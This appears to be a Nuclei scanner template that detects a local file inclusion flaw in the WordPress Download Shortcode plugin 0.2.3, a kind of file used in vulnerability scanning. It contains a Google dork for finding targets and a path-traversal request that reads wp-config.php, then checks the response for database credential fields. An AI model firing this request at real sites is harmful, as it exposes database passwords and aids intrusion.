id: shortcode-lfi info: name: WordPress Plugin Download Shortcode Local File Inclusion (0.2.3) author: dhiyaneshDK severity: high description: WordPress Plugin Download Shortcode is prone to a local file inclusion vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin Download Shortcode version 0.2.3 is vulnerable; prior versions may also be affected. reference: - https://packetstormsecurity.com/files/128024/WordPress-ShortCode-1.1-Local-File-Inclusion.html metadata: google-dork: inurl:wp/wp-content/force-download.php tags: wordpress,wp-plugin,lfi,shortcode,wp requests: - method: GET path: - '{{BaseURL}}/wp-content/force-download.php?file=../wp-config.php' matchers-condition: and matchers: - type: word part: body words: - "DB_NAME" - "DB_PASSWORD" condition: and - type: status status: - 200